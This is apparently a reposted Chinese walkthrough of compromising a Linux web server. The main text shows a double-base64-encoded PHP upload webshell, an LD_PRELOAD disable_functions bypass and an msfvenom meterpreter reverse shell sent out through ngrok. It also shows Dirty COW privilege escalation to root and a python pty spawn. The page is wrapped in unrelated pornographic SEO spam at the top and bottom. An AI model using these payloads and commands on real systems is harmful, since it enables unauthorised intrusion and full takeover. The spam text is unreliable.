色哟哟视频在线观看-色哟哟视频在线-色哟哟欧美15最新在线-色哟哟免费在线观看-国产l精品国产亚洲区在线观看-国产l精品国产亚洲区久久

0
  • 聊天消息
  • 系統消息
  • 評論與回復
登錄后你可以
  • 下載海量資料
  • 學習在線課程
  • 觀看技術視頻
  • 寫文章/發帖/加入社區
會員中心
創作中心

完善資料讓更多小伙伴認識你,還能領取20積分哦,立即完善>

3天內不再提示

記腳本小子的一次滲透全過程

jf_Fo0qk3ln ? 來源:菜鳥學信安 ? 2023-06-14 09:21 ? 次閱讀

一.前言

在一次綜合滲透的過程中遇到的比較完整的一個滲透流程。很多現查的技巧,這次滲透的基礎是基于隊友已經在服務器寫入了一句話木馬但無法執行系統命令。 二.滲透過程 一開始,我想到的是傳個大馬上去,為了方便,先寫入了一個上傳馬:

?a=fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(base64_decode(UEQ5d2FIQWdEUXBBSkhSbGJYQWdQU0FrWDBaSlRFVlRXeWQxY0d4dllXUmZabWxzWlNkZFd5ZDBiWEJmYm1GdFpTZGRPdzBLUUNSbWFXeGxJRDBnWW1GelpXNWhiV1VvSkY5R1NVeEZVMXNuZFhCc2IyRmtYMlpwYkdVblhWc25ibUZ0WlNkZEtUc05DbWxtSUNobGJYQjBlU0FvSkdacGJHVXBLWHNOQ21WamFHOGdJanhtYjNKdElHRmpkR2x2YmlBOUlDY25JRzFsZEdodlpDQTlJQ2RRVDFOVUp5QkZUa05VV1ZCRlBTZHRkV3gwYVhCaGNuUXZabTl5YlMxa1lYUmhKejVjYmlJN1pXTm9ieUFpVEc5allXd2dabWxzWlRvZ1BHbHVjSFYwSUhSNWNHVWdQU0FuWm1sc1pTY2dibUZ0WlNBOUlDZDFjR3h2WVdSZlptbHNaU2MrWEc0aU8yVmphRzhnSWp4cGJuQjFkQ0IwZVhCbElEMGdKM04xWW0xcGRDY2dkbUZzZFdVZ1BTQW5WWEJzYjJGa0p6NWNiaUk3WldOb2J5QWlQQzltYjNKdFBseHVQSEJ5WlQ1Y2JseHVQQzl3Y21VK0lqdDlaV3h6WlNCN2FXWW9iVzkyWlY5MWNHeHZZV1JsWkY5bWFXeGxLQ1IwWlcxd0xDUm1hV3hsS1NsN1pXTm9ieUFpUm1sc1pTQjFjR3h2WVdSbFpDQnpkV05qWlhOelpuVnNiSGt1UEhBK1hHNGlPMzFsYkhObElIdGxZMmh2SUNKVmJtRmliR1VnZEc4Z2RYQnNiMkZrSUNJZ0xpQWtabWxzWlNBdUlDSXVQSEErWEc0aU8zMTlQejQ9)));
4404c354-0a4b-11ee-962d-dac502259ad0.png 利用這個上傳馬(shell.php)上傳了一個比較常用的大馬(297.php)。發現無法執行系統命令(無回顯):

441f21c2-0a4b-11ee-962d-dac502259ad0.png

查看phpinfo()發現應該是disable_function()的原因。隨即使用github上大佬LD_PRELOAD的bypass馬:


https://github.com/zhinaonet/bypass_disablefunc_via_LD_PRELOAD 成功執行命令:

4439da1c-0a4b-11ee-962d-dac502259ad0.png

可以執行命令后便想著提權,直接上虛擬機里的kali先用ngrok把虛擬機里的內網穿透出去:

4448f1a0-0a4b-11ee-962d-dac502259ad0.png

啟動msf:


msfconsole msfvenom -l payloads msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=ip LPORT=10017 -f elf > shell.elf 生成反彈shell:

44714740-0a4b-11ee-962d-dac502259ad0.png


use exploit/multi/handler set PAYLOAD linux/x64/meterpreter_reverse_tcp set LHOST 192.168.1.170 set LPORT 4444 run 開啟監聽,同時把生成的elf文件用上傳馬上傳到服務器,用bypass馬chmod賦予權限后執行。 即可反彈成功:

44938b8e-0a4b-11ee-962d-dac502259ad0.png

拿到反彈shell后就想著提權,一看內核版本是在臟牛的覆蓋范圍,就嘗試臟牛一把梭。 先去github上下載臟牛的exp源碼:


https://github.com/FireFart/dirtycow 上傳上去之后執行命令:

gcc -pthread dirty.c -o dirty -lcrypt ./dirty 執行成功! 但在su切換用戶的時候出現了幺蛾子:

44bdf7e8-0a4b-11ee-962d-dac502259ad0.png

Standard in must be a tty這種情況我還是頭一次遇見。通過查詢,發現可以用python繞過它:


python -c 'import pty; pty.spawn("/bin/sh")' su firefart

輸入密碼,即可提權成功:

4501bdfc-0a4b-11ee-962d-dac502259ad0.png

于此已經拿到了root權限。后滲透階段由于本人不太熟悉就暫且不提了。

三.總結 這次滲透沒有什么特別難的難點,主要是隊友把一句話傳上去打了個好的基礎。作為腳本小子的我也不過是用網上大佬們的工具完成了此次滲透。學藝不精還需要繼續和菊苣們學習。

責任編輯:彭菁

聲明:本文內容及配圖由入駐作者撰寫或者入駐合作網站授權轉載。文章觀點僅代表作者本人,不代表電子發燒友網立場。文章及其配圖僅供工程師學習之用,如有內容侵權或者其他違規問題,請聯系本站處理。 舉報投訴
  • 服務器
    +關注

    關注

    12

    文章

    9123

    瀏覽量

    85324
  • 滲透
    +關注

    關注

    0

    文章

    20

    瀏覽量

    6273
  • 腳本
    +關注

    關注

    1

    文章

    389

    瀏覽量

    14858

原文標題:實戰|記腳本小子的一次滲透全過程

文章出處:【微信號:菜鳥學信安,微信公眾號:菜鳥學信安】歡迎添加關注!文章轉載請注明出處。

收藏 人收藏

    評論

    相關推薦

    筆記本組裝全過程圖解.pdf

    筆記本組裝全過程圖解.pdf
    發表于 12-26 21:22

    熱轉印電路板制作全過程

    熱轉印電路板制作全過程
    發表于 06-24 00:46

    PCB 制作全過程

    `PCB 制作全過程。`
    發表于 08-05 22:43

    音箱制作全過程

    音箱制作全過程
    發表于 08-16 17:00

    有人分享制作藍牙耳機的全過程嗎?

    我想自己制作個藍牙耳機,但是技術不夠,希望有人分享下藍牙耳機的制作全過程,可以是模塊應用,最好是從底層開始制作的,包括軟件的編寫代碼。{:23:}
    發表于 06-02 18:42

    分享個串口實現全過程好資料

    偶然中看到的篇好資料,不敢獨享,來給大家分享下,這里有特別詳細的串口實現通信的全過程,親自操作遍,可零基礎實現串口通信,希望能幫助到大家!
    發表于 02-05 17:18

    中夏s66e組裝全過程

    中夏s66e組裝全過程視頻、圖解?????
    發表于 05-12 11:33

    講述PCB設計全過程操作

    網上AD教程看似很多,實則零散,詳細地講述PCB設計全過程操作的實用教程并不多,而且大都是舊版本的AD,所以本人寫了個詳盡的手把手畫板教程,內容是目前的流行單片機:stm32的最小系統,新手也能快速上手本教程分為三篇:元件庫的建立,原理圖的畫法,P...
    發表于 08-03 07:40

    CPU制造全過程

    CPU制造全過程第1頁:由沙到晶圓,CPU誕生全過程     沙中含有25%的硅,是地殼中第二多元素,在經過氧化之后就成為了二氧化硅,在沙,尤其是石英中二氧
    發表于 09-22 08:08 ?77次下載

    組裝電腦全過程視頻教程

    組裝電腦全過程視頻教程 教你認識電腦主機各種配件及組裝接線方法
    發表于 09-14 11:05 ?467次下載

    Uboot啟動的全過程詳細資料分析

    本文檔的主要內容詳細介紹的是Uboot啟動的全過程詳細資料分析。
    發表于 04-25 08:00 ?6次下載
    Uboot啟動的<b class='flag-5'>全過程</b>詳細資料分析

    用C語言開發DSP系統的全過程的講解

    用C語言開發DSP系統的全過程的講解。
    發表于 05-26 14:17 ?22次下載

    手工制作pcb全過程

    手工制作pcb全過程介紹。
    發表于 06-19 10:18 ?0次下載

    芯片制造全過程

    有人說芯片是人類最高智慧的代表,很多人都無法理解,接下來跟隨小編起了解芯片的制作全過程,看完你就懂了。
    的頭像 發表于 12-08 17:42 ?1.2w次閱讀

    電磁爐的維修全過程分享

    電磁爐的維修全過程分享
    發表于 01-10 15:16 ?78次下載
    主站蜘蛛池模板: 丰满人妻无码AV系列| 亚洲免费久久| 欧美大jiji| 免费国产久久啪在线| 久久精品在现线观看免费15| 国产一级特黄aa毛片| 国产全肉乱妇杂乱视频| 国产电影午夜成年免费视频| 高清撒尿hdtube撒尿| 抽插妇女疯狂视频| 丰满少妇69激懒啪啪无码| 国产成人免费高清激情视频| 被黑人做的白浆直流| 处破女免费播放| 囯产精品久久久久免费蜜桃| 高清mv视频免费观看| 国产精品久久久久久日本| 国产精品白浆精子流水合集| 国产精品久久自在自2021| 国产乱人伦AV麻豆网| 国产中的精品AV一区二区| 国产中文字幕乱码免费| 久久国产精品免费A片蜜芽| 久久婷婷五月综合色情| 蜜桃传媒在线观看入口| 欧美xxxxx九色视频免费观看| 欧美人与动牲交A免费| 日本少妇无码精品12P| 十二月综合缴缴情| 亚洲国产亚综合在线区尤物| 亚洲中文字幕永久在线| 91看片淫黄大片.在线天堂| videos gratis欧美另类| 国产超碰精久久久久久无码AV| 国产精品久久久久久人妻精品流| 国产在线观看免费观看不卡| 久久久96人妻无码精品蜜桃| 末班车动漫无删减免费| 色戒在线完整观看在线播放版| 校花的奶好大好浪| 综合人妻久久一区二区精品|